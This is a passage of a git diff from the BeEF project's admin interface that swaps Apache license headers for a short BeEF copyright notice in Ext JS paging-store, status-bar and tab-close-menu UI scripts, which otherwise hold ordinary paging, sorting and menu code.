this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/* - * PagingStore for Ext 3.2 - v0.5 - */ -Ext.ns('Ext.ux.data'); -Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, { - add: function (records) { - records = [].concat(records); - if (records.length < 1) { - return; - } - for (var i = 0, len = records.length; i < len; i++) { - records[i].join(this); - } - var index = this.data.length; - this.data.addAll(records); - // *** add *** - if (this.allData) { - this.allData.addAll(records); - } - // *** end *** - if (this.snapshot) { - this.snapshot.addAll(records); - } - // *** add *** - this.totalLength += records.length; - // *** end *** - this.fireEvent('add', this, records, index); - }, - remove: function (record) { - if (Ext.isArray(record)) { - Ext.each(record, function (r) { - this.remove(r); - }, this); - return; - } - // *** add *** - if (this != record.store) { - return; - } - record.join(null); - // *** end *** - var index = this.data.indexOf(record); - if (index > -1) { - // record.join(null); - this.data.removeAt(index); - } - if (this.pruneModifiedRecords) { - this.modified.remove(record); - } - // *** add *** - if (this.allData) { - this.allData.remove(record); - } - // *** end *** - if (this.snapshot) { - this.snapshot.remove(record); - } - // *** add *** - this.totalLength--; - // *** end *** - if (index > -1) { - this.fireEvent('remove', this, record, index); - } - }, - removeAll: function (silent) { - // *** add *** - var items = [].concat((this.snapshot || this.allData || this.data).items); - // *** end *** - // var items = []; - // this.each(function (rec) { - // items.push(rec); - // }); - this.clearData(); - // if (this.snapshot) { - // this.snapshot.clear(); - // } - if (this.pruneModifiedRecords) { - this.modified = []; - } - // *** add *** - this.totalLength = 0; - // *** end *** - if (silent !== true) { - this.fireEvent('clear', this, items); - } - }, - insert: function (index, records) { - records = [].concat(records); - for (var i = 0, len = records.length; i < len; i++) { - this.data.insert(index, records[i]); - records[i].join(this); - } - // *** add *** - if (this.allData) { - this.allData.addAll(records); - } - // *** end *** - if (this.snapshot) { - this.snapshot.addAll(records); - } - // *** add *** - this.totalLength += records.length; - // *** end *** - this.fireEvent('add', this, records, index); - }, - getById: function (id) { - // *** add *** - return (this.snapshot || this.allData || this.data).key(id); - // *** end *** - // return this.data.key(id); - }, - clearData: function () { - // *** add *** - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - if (this.snapshot) { - this.data = this.snapshot; - delete this.snapshot; - } - // *** end *** - this.data.each(function (rec) { - rec.join(null); - }); - this.data.clear(); - }, - execute: function (action, rs, options, batch) { - if (!Ext.data.Api.isAction(action)) { - throw new Ext.data.Api.Error('execute', action); - } - options = Ext.applyIf(options || {}, { - params: {} - }); - if (batch !== undefined) { - this.addToBatch(batch); - } - var doRequest = true; - if (action === 'read') { - doRequest = this.fireEvent('beforeload', this, options); - Ext.applyIf(options.params, this.baseParams); - } - else { - if (this.writer.listful === true && this.restful !== true) { - rs = (Ext.isArray(rs)) ? rs : [rs]; - } - else if (Ext.isArray(rs) && rs.length == 1) { - rs = rs.shift(); - } - if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) { - this.writer.apply(options.params, this.baseParams, action, rs); - } - } - if (doRequest !== false) { - if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) { - options.params.xaction = action; - } - // *** add *** - if (action === "read" && this.isPaging(Ext.apply({}, options.params))) { - (function () { - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - this.applyPaging(); - this.fireEvent("datachanged", this); - var r = [].concat(this.data.items); - this.fireEvent("load", this, r, options); - if (options.callback) { - options.callback.call(options.scope || this, r, options, true); - } - }).defer(1, this); - return true; - } - // *** end *** - this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options); - } - return doRequest; - }, - loadRecords: function (o, options, success) { - if (this.isDestroyed === true) { - return; - } - if (!o || success === false) { - if (success !== false) { - this.fireEvent('load', this, [], options); - } - if (options.callback) { - options.callback.call(options.scope || this, [], options, false, o); - } - return; - } - var r = o.records, - t = o.totalRecords || r.length; - if (!options || options.add !== true) { - if (this.pruneModifiedRecords) { - this.modified = []; - } - for (var i = 0, len = r.length; i < len; i++) { - r[i].join(this); - } - //if (this.snapshot) { - // this.data = this.snapshot; - // delete this.snapshot; - //} - this.clearData(); - this.data.addAll(r); - this.totalLength = t; - this.applySort(); - // *** add *** - if (!this.allData) { - this.applyPaging(); - } - if (r.length > this.getCount()) { - r = [].concat(this.data.items); - } - // *** end *** - this.fireEvent('datachanged', this); - } else { - this.totalLength = Math.max(t, this.data.length + r.length); - this.add(r); - } - this.fireEvent('load', this, r, options); - if (options.callback) { - options.callback.call(options.scope || this, r, options, true); - } - }, - loadData: function (o, append) { - // *** add *** - this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams)); - // *** end *** - var r = this.reader.readRecords(o); - this.loadRecords(r, { - add: append - }, true); - }, - getTotalCount: function () { - // *** add *** - if (this.allData) { - return this.allData.getCount(); - } - // *** end *** - return this.totalLength || 0; - }, - sortData: function () { - var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo, - direction = sortInfo.direction || "ASC", - sorters = sortInfo.sorters, - sortFns = []; - if (!this.hasMultiSort) { - sorters = [{ - direction: direction, - field: sortInfo.field - }]; - } - for (var i = 0, j = sorters.length; i < j; i++) { - sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction)); - } - if (!sortFns.length) { - return; - } - var directionModifier = direction.toUpperCase() == "DESC" ? -1 : 1; - var fn = function (r1, r2) { - var result = sortFns[0].call(this, r1, r2); - if (sortFns.length > 1) { - for (var i = 1, j = sortFns.length; i < j; i++) { - result = result || sortFns[i].call(this, r1, r2); - } - } - return directionModifier * result; - }; - // *** add *** - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - // *** end *** - this.data.sort(direction, fn); - if (this.snapshot && this.snapshot != this.data) { - this.snapshot.sort(direction, fn); - } - // *** add *** - this.applyPaging(); - // *** end *** - }, - filterBy: function (fn, scope) { - // *** add *** - this.snapshot = this.snapshot || this.allData || this.data; - // *** end *** - // this.snapshot = this.snapshot || this.data; - this.data = this.queryBy(fn, scope || this); - // *** add *** - this.applyPaging(); - // *** end *** - this.fireEvent('datachanged', this); - }, - clearFilter: function (suppressEvent) { - if (this.isFiltered()) { - this.data = this.snapshot; - delete this.snapshot; - // *** add *** - delete this.allData; - this.applyPaging(); - // *** end *** - if (suppressEvent !== true) { - this.fireEvent('datachanged', this); - } - } - }, - isFiltered: function () { - // *** add *** - return !!this.snapshot && this.snapshot != (this.allData || this.data); - // *** end *** - // return !!this.snapshot && this.snapshot != this.data; - }, - queryBy: function (fn, scope) { - // *** add *** - var data = this.snapshot || this.allData || this.data; - // *** end *** - // var data = this.snapshot || this.data; - return data.filterBy(fn, scope || this); - }, - collect: function (dataIndex, allowNull, bypassFilter) { - // *** add *** - var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items; - // *** end *** - // var d = (bypassFilter === true && this.snapshot) ? this.snapshot.items : this.data.items; - var v, sv, r = [], - l = {}; - for (var i = 0, len = d.length; i < len; i++) { - v = d[i].data[dataIndex]; - sv = String(v); - if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) { - l[sv] = true; - r[r.length] = v; - } - } - return r; - }, - findInsertIndex : function(record){ - this.suspendEvents(); - var data = this.data.clone(); - this.data.add(record); - this.applySort(); - var index = this.data.indexOf(record); - this.data = data; - // *** add *** - this.totalLength--; - // *** end *** - this.resumeEvents(); - return index; - }, - // *** add *** - isPaging: function (params) { - var pn = this.paramNames, - start = params[pn.start], - limit = params[pn.limit]; - if ((typeof start != 'number') || (typeof limit != 'number')) { - delete this.start; - delete this.limit; - this.lastParams = params; - return false; - } - this.start = start; - this.limit = limit; - delete params[pn.start]; - delete params[pn.limit]; - var lastParams = this.lastParams; - this.lastParams = params; - if (!this.proxy) { - return true; - } - if (!lastParams) { - return false; - } - for (var param in params) { - if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) { - return false; - } - } - for (param in lastParams) { - if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) { - return false; - } - } - return true; - }, - applyPaging: function () { - var start = this.start, - limit = this.limit; - if ((typeof start == 'number') && (typeof limit == 'number')) { - var allData = this.data, - data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey); - data.items = allData.items.slice(start, start + limit); - data.keys = allData.keys.slice(start, start + limit); - var len = data.length = data.items.length; - var map = {}; - for (var i = 0; i < len; i++) { - var item = data.items[i]; - map[data.getKey(item)] = item; - } - data.map = map; - this.allData = allData; - this.data = data; - } - } - // *** end *** -}); - -Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.DirectStore.prototype.constructor -}); -Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore); - -Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.JsonStore.prototype.constructor -}); -Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore); - -Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.XmlStore.prototype.constructor -}); -Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore); - -Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.ArrayStore.prototype.constructor, - loadData: function (data, append) { - if (this.expandData === true) { - var r = []; - for (var i = 0, len = data.length; i < len; i++) { - r[r.length] = [data[i]]; - } - data = r; - } - Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append); - } -}); -Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore); - -Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore; -Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore); - -Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [ - 'constructor', - 'remoteGroup', - 'groupOnSort', - 'groupDir', - 'clearGrouping', - 'groupBy', - 'sort', - 'applyGroupField', - 'applyGrouping', - 'getGroupState' -])); -Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore); - -Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, { - onLoad: function (store, r, o) { - if (!this.rendered) { - this.dsLoaded = [store, r, o]; - return; - } - var p = this.getParams(); - this.cursor = (o.params && o.params[p.start]) ? o.params[p.start] : 0; - this.onChange(); - // *** end *** - // var d = this.getPageData(), - // ap = d.activePage, - // ps = d.pages; - // this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); - // this.inputItem.setValue(ap); - // this.first.setDisabled(ap == 1); - // this.prev.setDisabled(ap == 1); - // this.next.setDisabled(ap == ps); - // this.last.setDisabled(ap == ps); - // this.refresh.enable(); - // this.updateInfo(); - // this.fireEvent('change', this, d); - }, - onChange: function () { - // *** add *** - var t = this.store.getTotalCount(), - s = this.pageSize; - if (this.cursor >= t) { - this.cursor = Math.ceil((t + 1) / s) * s; - } - // *** end *** - var d = this.getPageData(), - ap = d.activePage, - ps = d.pages; - this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); - this.inputItem.setValue(ap); - this.first.setDisabled(ap == 1); - this.prev.setDisabled(ap == 1); - this.next.setDisabled(ap == ps); - this.last.setDisabled(ap == ps); - this.refresh.enable(); - this.updateInfo(); - this.fireEvent('change', this, d); - }, - onClear: function () { - this.cursor = 0; - this.onChange(); - }, - doRefresh: function () { - // *** add *** - delete this.store.lastParams; - // *** end *** - this.doLoad(this.cursor); - }, - bindStore: function (store, initial) { - var doLoad; - if (!initial && this.store) { - if (store !== this.store && this.store.autoDestroy) { - this.store.destroy(); - } else { - this.store.un('beforeload', this.beforeLoad, this); - this.store.un('load', this.onLoad, this); - this.store.un('exception', this.onLoadError, this); - // *** add *** - this.store.un('datachanged', this.onChange, this); - this.store.un('add', this.onChange, this); - this.store.un('remove', this.onChange, this); - this.store.un('clear', this.onClear, this); - // *** end *** - } - if (!store) { - this.store = null; - } - } - if (store) { - store = Ext.StoreMgr.lookup(store); - store.on({ - scope: this, - beforeload: this.beforeLoad, - load: this.onLoad, - exception: this.onLoadError, - // *** add *** - datachanged: this.onChange, - add: this.onChange, - remove: this.onChange, - clear: this.onClear - // *** end *** - }); - doLoad = true; - } - this.store = store; - if (doLoad) { - this.onLoad(store, null, {}); - } - } -}); -Ext.reg('ux.paging', Ext.ux.PagingToolbar); +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * PagingStore for Ext 3.2 - v0.5 + */ +Ext.ns('Ext.ux.data'); +Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, { + add: function (records) { + records = [].concat(records); + if (records.length < 1) { + return; + } + for (var i = 0, len = records.length; i < len; i++) { + records[i].join(this); + } + var index = this.data.length; + this.data.addAll(records); + // *** add *** + if (this.allData) { + this.allData.addAll(records); + } + // *** end *** + if (this.snapshot) { + this.snapshot.addAll(records); + } + // *** add *** + this.totalLength += records.length; + // *** end *** + this.fireEvent('add', this, records, index); + }, + remove: function (record) { + if (Ext.isArray(record)) { + Ext.each(record, function (r) { + this.remove(r); + }, this); + return; + } + // *** add *** + if (this != record.store) { + return; + } + record.join(null); + // *** end *** + var index = this.data.indexOf(record); + if (index > -1) { + // record.join(null); + this.data.removeAt(index); + } + if (this.pruneModifiedRecords) { + this.modified.remove(record); + } + // *** add *** + if (this.allData) { + this.allData.remove(record); + } + // *** end *** + if (this.snapshot) { + this.snapshot.remove(record); + } + // *** add *** + this.totalLength--; + // *** end *** + if (index > -1) { + this.fireEvent('remove', this, record, index); + } + }, + removeAll: function (silent) { + // *** add *** + var items = [].concat((this.snapshot || this.allData || this.data).items); + // *** end *** + // var items = []; + // this.each(function (rec) { + // items.push(rec); + // }); + this.clearData(); + // if (this.snapshot) { + // this.snapshot.clear(); + // } + if (this.pruneModifiedRecords) { + this.modified = []; + } + // *** add *** + this.totalLength = 0; + // *** end *** + if (silent !== true) { + this.fireEvent('clear', this, items); + } + }, + insert: function (index, records) { + records = [].concat(records); + for (var i = 0, len = records.length; i < len; i++) { + this.data.insert(index, records[i]); + records[i].join(this); + } + // *** add *** + if (this.allData) { + this.allData.addAll(records); + } + // *** end *** + if (this.snapshot) { + this.snapshot.addAll(records); + } + // *** add *** + this.totalLength += records.length; + // *** end *** + this.fireEvent('add', this, records, index); + }, + getById: function (id) { + // *** add *** + return (this.snapshot || this.allData || this.data).key(id); + // *** end *** + // return this.data.key(id); + }, + clearData: function () { + // *** add *** + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + if (this.snapshot) { + this.data = this.snapshot; + delete this.snapshot; + } + // *** end *** + this.data.each(function (rec) { + rec.join(null); + }); + this.data.clear(); + }, + execute: function (action, rs, options, batch) { + if (!Ext.data.Api.isAction(action)) { + throw new Ext.data.Api.Error('execute', action); + } + options = Ext.applyIf(options || {}, { + params: {} + }); + if (batch !== undefined) { + this.addToBatch(batch); + } + var doRequest = true; + if (action === 'read') { + doRequest = this.fireEvent('beforeload', this, options); + Ext.applyIf(options.params, this.baseParams); + } + else { + if (this.writer.listful === true && this.restful !== true) { + rs = (Ext.isArray(rs)) ? rs : [rs]; + } + else if (Ext.isArray(rs) && rs.length == 1) { + rs = rs.shift(); + } + if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) { + this.writer.apply(options.params, this.baseParams, action, rs); + } + } + if (doRequest !== false) { + if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) { + options.params.xaction = action; + } + // *** add *** + if (action === "read" && this.isPaging(Ext.apply({}, options.params))) { + (function () { + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + this.applyPaging(); + this.fireEvent("datachanged", this); + var r = [].concat(this.data.items); + this.fireEvent("load", this, r, options); + if (options.callback) { + options.callback.call(options.scope || this, r, options, true); + } + }).defer(1, this); + return true; + } + // *** end *** + this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options); + } + return doRequest; + }, + loadRecords: function (o, options, success) { + if (this.isDestroyed === true) { + return; + } + if (!o || success === false) { + if (success !== false) { + this.fireEvent('load', this, [], options); + } + if (options.callback) { + options.callback.call(options.scope || this, [], options, false, o); + } + return; + } + var r = o.records, + t = o.totalRecords || r.length; + if (!options || options.add !== true) { + if (this.pruneModifiedRecords) { + this.modified = []; + } + for (var i = 0, len = r.length; i < len; i++) { + r[i].join(this); + } + //if (this.snapshot) { + // this.data = this.snapshot; + // delete this.snapshot; + //} + this.clearData(); + this.data.addAll(r); + this.totalLength = t; + this.applySort(); + // *** add *** + if (!this.allData) { + this.applyPaging(); + } + if (r.length > this.getCount()) { + r = [].concat(this.data.items); + } + // *** end *** + this.fireEvent('datachanged', this); + } else { + this.totalLength = Math.max(t, this.data.length + r.length); + this.add(r); + } + this.fireEvent('load', this, r, options); + if (options.callback) { + options.callback.call(options.scope || this, r, options, true); + } + }, + loadData: function (o, append) { + // *** add *** + this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams)); + // *** end *** + var r = this.reader.readRecords(o); + this.loadRecords(r, { + add: append + }, true); + }, + getTotalCount: function () { + // *** add *** + if (this.allData) { + return this.allData.getCount(); + } + // *** end *** + return this.totalLength || 0; + }, + sortData: function () { + var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo, + direction = sortInfo.direction || "ASC", + sorters = sortInfo.sorters, + sortFns = []; + if (!this.hasMultiSort) { + sorters = [{ + direction: direction, + field: sortInfo.field + }]; + } + for (var i = 0, j = sorters.length; i < j; i++) { + sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction)); + } + if (!sortFns.length) { + return; + } + var directionModifier = direction.toUpperCase() == "DESC" ? -1 : 1; + var fn = function (r1, r2) { + var result = sortFns[0].call(this, r1, r2); + if (sortFns.length > 1) { + for (var i = 1, j = sortFns.length; i < j; i++) { + result = result || sortFns[i].call(this, r1, r2); + } + } + return directionModifier * result; + }; + // *** add *** + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + // *** end *** + this.data.sort(direction, fn); + if (this.snapshot && this.snapshot != this.data) { + this.snapshot.sort(direction, fn); + } + // *** add *** + this.applyPaging(); + // *** end *** + }, + filterBy: function (fn, scope) { + // *** add *** + this.snapshot = this.snapshot || this.allData || this.data; + // *** end *** + // this.snapshot = this.snapshot || this.data; + this.data = this.queryBy(fn, scope || this); + // *** add *** + this.applyPaging(); + // *** end *** + this.fireEvent('datachanged', this); + }, + clearFilter: function (suppressEvent) { + if (this.isFiltered()) { + this.data = this.snapshot; + delete this.snapshot; + // *** add *** + delete this.allData; + this.applyPaging(); + // *** end *** + if (suppressEvent !== true) { + this.fireEvent('datachanged', this); + } + } + }, + isFiltered: function () { + // *** add *** + return !!this.snapshot && this.snapshot != (this.allData || this.data); + // *** end *** + // return !!this.snapshot && this.snapshot != this.data; + }, + queryBy: function (fn, scope) { + // *** add *** + var data = this.snapshot || this.allData || this.data; + // *** end *** + // var data = this.snapshot || this.data; + return data.filterBy(fn, scope || this); + }, + collect: function (dataIndex, allowNull, bypassFilter) { + // *** add *** + var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items; + // *** end *** + // var d = (bypassFilter === true && this.snapshot) ? this.snapshot.items : this.data.items; + var v, sv, r = [], + l = {}; + for (var i = 0, len = d.length; i < len; i++) { + v = d[i].data[dataIndex]; + sv = String(v); + if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) { + l[sv] = true; + r[r.length] = v; + } + } + return r; + }, + findInsertIndex : function(record){ + this.suspendEvents(); + var data = this.data.clone(); + this.data.add(record); + this.applySort(); + var index = this.data.indexOf(record); + this.data = data; + // *** add *** + this.totalLength--; + // *** end *** + this.resumeEvents(); + return index; + }, + // *** add *** + isPaging: function (params) { + var pn = this.paramNames, + start = params[pn.start], + limit = params[pn.limit]; + if ((typeof start != 'number') || (typeof limit != 'number')) { + delete this.start; + delete this.limit; + this.lastParams = params; + return false; + } + this.start = start; + this.limit = limit; + delete params[pn.start]; + delete params[pn.limit]; + var lastParams = this.lastParams; + this.lastParams = params; + if (!this.proxy) { + return true; + } + if (!lastParams) { + return false; + } + for (var param in params) { + if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) { + return false; + } + } + for (param in lastParams) { + if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) { + return false; + } + } + return true; + }, + applyPaging: function () { + var start = this.start, + limit = this.limit; + if ((typeof start == 'number') && (typeof limit == 'number')) { + var allData = this.data, + data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey); + data.items = allData.items.slice(start, start + limit); + data.keys = allData.keys.slice(start, start + limit); + var len = data.length = data.items.length; + var map = {}; + for (var i = 0; i < len; i++) { + var item = data.items[i]; + map[data.getKey(item)] = item; + } + data.map = map; + this.allData = allData; + this.data = data; + } + } + // *** end *** +}); + +Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.DirectStore.prototype.constructor +}); +Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore); + +Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.JsonStore.prototype.constructor +}); +Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore); + +Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.XmlStore.prototype.constructor +}); +Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore); + +Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.ArrayStore.prototype.constructor, + loadData: function (data, append) { + if (this.expandData === true) { + var r = []; + for (var i = 0, len = data.length; i < len; i++) { + r[r.length] = [data[i]]; + } + data = r; + } + Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append); + } +}); +Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore); + +Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore; +Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore); + +Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [ + 'constructor', + 'remoteGroup', + 'groupOnSort', + 'groupDir', + 'clearGrouping', + 'groupBy', + 'sort', + 'applyGroupField', + 'applyGrouping', + 'getGroupState' +])); +Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore); + +Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, { + onLoad: function (store, r, o) { + if (!this.rendered) { + this.dsLoaded = [store, r, o]; + return; + } + var p = this.getParams(); + this.cursor = (o.params && o.params[p.start]) ? o.params[p.start] : 0; + this.onChange(); + // *** end *** + // var d = this.getPageData(), + // ap = d.activePage, + // ps = d.pages; + // this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); + // this.inputItem.setValue(ap); + // this.first.setDisabled(ap == 1); + // this.prev.setDisabled(ap == 1); + // this.next.setDisabled(ap == ps); + // this.last.setDisabled(ap == ps); + // this.refresh.enable(); + // this.updateInfo(); + // this.fireEvent('change', this, d); + }, + onChange: function () { + // *** add *** + var t = this.store.getTotalCount(), + s = this.pageSize; + if (this.cursor >= t) { + this.cursor = Math.ceil((t + 1) / s) * s; + } + // *** end *** + var d = this.getPageData(), + ap = d.activePage, + ps = d.pages; + this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); + this.inputItem.setValue(ap); + this.first.setDisabled(ap == 1); + this.prev.setDisabled(ap == 1); + this.next.setDisabled(ap == ps); + this.last.setDisabled(ap == ps); + this.refresh.enable(); + this.updateInfo(); + this.fireEvent('change', this, d); + }, + onClear: function () { + this.cursor = 0; + this.onChange(); + }, + doRefresh: function () { + // *** add *** + delete this.store.lastParams; + // *** end *** + this.doLoad(this.cursor); + }, + bindStore: function (store, initial) { + var doLoad; + if (!initial && this.store) { + if (store !== this.store && this.store.autoDestroy) { + this.store.destroy(); + } else { + this.store.un('beforeload', this.beforeLoad, this); + this.store.un('load', this.onLoad, this); + this.store.un('exception', this.onLoadError, this); + // *** add *** + this.store.un('datachanged', this.onChange, this); + this.store.un('add', this.onChange, this); + this.store.un('remove', this.onChange, this); + this.store.un('clear', this.onClear, this); + // *** end *** + } + if (!store) { + this.store = null; + } + } + if (store) { + store = Ext.StoreMgr.lookup(store); + store.on({ + scope: this, + beforeload: this.beforeLoad, + load: this.onLoad, + exception: this.onLoadError, + // *** add *** + datachanged: this.onChange, + add: this.onChange, + remove: this.onChange, + clear: this.onClear + // *** end *** + }); + doLoad = true; + } + this.store = store; + if (doLoad) { + this.onLoad(store, null, {}); + } + } +}); +Ext.reg('ux.paging', Ext.ux.PagingToolbar); diff --git a/extensions/admin_ui/media/javascript/ux/StatusBar.js b/extensions/admin_ui/media/javascript/ux/StatusBar.js index ac1e5f5c6..9b70abe46 100644 --- a/extensions/admin_ui/media/javascript/ux/StatusBar.js +++ b/extensions/admin_ui/media/javascript/ux/StatusBar.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * Ext JS Library 3.1.1 * Copyright(c) 2006-2010 Ext JS, LLC diff --git a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js index 7ed3a50ac..a9bfde238 100644 --- a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js +++ b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js @@ -1,73 +1,64 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * Ext JS Library 3.1.1 - * Copyright(c) 2006-2010 Ext JS, LLC - * licensing@extjs.com - * http://www.extjs.com/license - */ -/** - * @class Ext.ux.TabCloseMenu - * @extends Object - * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs. - * - * @ptype tabclosemenu - */ -Ext.ux.TabCloseMenu = function(){ - var tabs, menu, ctxItem; - this.init = function(tp){ - tabs = tp; - tabs.on('contextmenu', onContextMenu); - }; - - function onContextMenu(ts, item, e){ - if(!menu){ // create context menu on first right click - menu = new Ext.menu.Menu({ - items: [{ - id: tabs.id + '-close', - text: 'Close Tab', - handler : function(){ - tabs.remove(ctxItem); - } - },{ - id: tabs.id + '-close-others', - text: 'Close Other Tabs', - handler : function(){ - tabs.items.each(function(item){ - if(item.closable && item != ctxItem){ - tabs.remove(item); - } - }); - } - }]}); - } - ctxItem = item; - var items = menu.items; - items.get(tabs.id + '-close').setDisabled(!item.closable); - var disableOthers = true; - tabs.items.each(function(){ - if(this != item && this.closable){ - disableOthers = false; - return false; - } - }); - items.get(tabs.id + '-close-others').setDisabled(disableOthers); - e.stopEvent(); - menu.showAt(e.getPoint()); - } -}; - -Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu); +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * Ext JS Library 3.1.1 + * Copyright(c) 2006-2010 Ext JS, LLC + * licensing@extjs.com + * http://www.extjs.com/license + */ +/** + * @class Ext.ux.TabCloseMenu + * @extends Object + * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs. + * + * @ptype tabclosemenu + */ +Ext.ux.TabCloseMenu = function(){ + var tabs, menu, ctxItem; + this.init = function(tp){ + tabs = tp; + tabs.on('contextmenu', onContextMenu); + }; + + function onContextMenu(ts, item, e){ + if(!menu){ // create context menu on first right click + menu = new Ext.menu.Menu({ + items: [{ + id: tabs.id + '-close', + text: 'Close Tab', + handler : function(){ + tabs.remove(ctxItem); + } + },{ + id: tabs.id + '-close-others', + text: 'Close Other Tabs', + handler : function(){ + tabs.items.each(function(item){ + if(item.closable && item != ctxItem){ + tabs.remove(item); + } + }); + } + }]}); + } + ctxItem = item; + var items = menu.items; + items.get(tabs.id + '-close').setDisabled(!item.closable); + var disableOthers = true; + tabs.items.each(function(){ + if(this != item && this.closable){ + disableOthers = false; + return false; + } + }); + items.get(tabs.id + '-close-others').setDisabled(disableOthers); + e.stopEvent(); + menu.showAt(e.getPoint()); + } +}; + +Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu); diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js new file mode 100644 index 